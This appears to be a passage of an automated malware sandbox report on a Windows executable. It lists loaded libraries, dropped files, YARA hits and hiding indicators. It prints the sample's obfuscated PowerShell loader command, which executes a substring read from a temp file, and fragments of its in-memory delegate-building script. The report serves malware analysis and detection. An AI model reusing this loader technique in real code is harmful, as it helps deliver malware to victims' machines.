                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) "Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeFile written: C:\Program Files (x86)\Common Files\Jervin197.iniJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: REnBTVfW8q.exeStatic file information: File size 1157372 > 1048576
                  Source: REnBTVfW8q.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1646767837.0000000008B23000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1646767837.0000000008B23000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: Yara matchFile source: 00000002.00000002.1647881409.000000000C7EF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1647862127.00000000094F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1438403773.0000000002999000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1641405594.0000000006319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Dusinenes.Hav, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nsc2139.tmp, type: DROPPED
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Sammensmeltende194 $Konfunderer123 $Polyisobutene), (Baftah @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Morgenmaden = [AppDomain]::CurrentDomain.GetAss
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Factions)), $Laywomen).DefineDynamicModule($Squillagee, $false).DefineType($Nonresistively, $Bastning, [System.MulticastDelegate])$Nac
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0501CE82 push eax; mov dword ptr [esp], edx2_2_0501CE94
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0501D528 push esp; iretd 2_2_0501D571
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0501D590 push esp; iretd 2_2_0501D571
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00C70C77 push edi; retf 5_2_00C70C7A

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
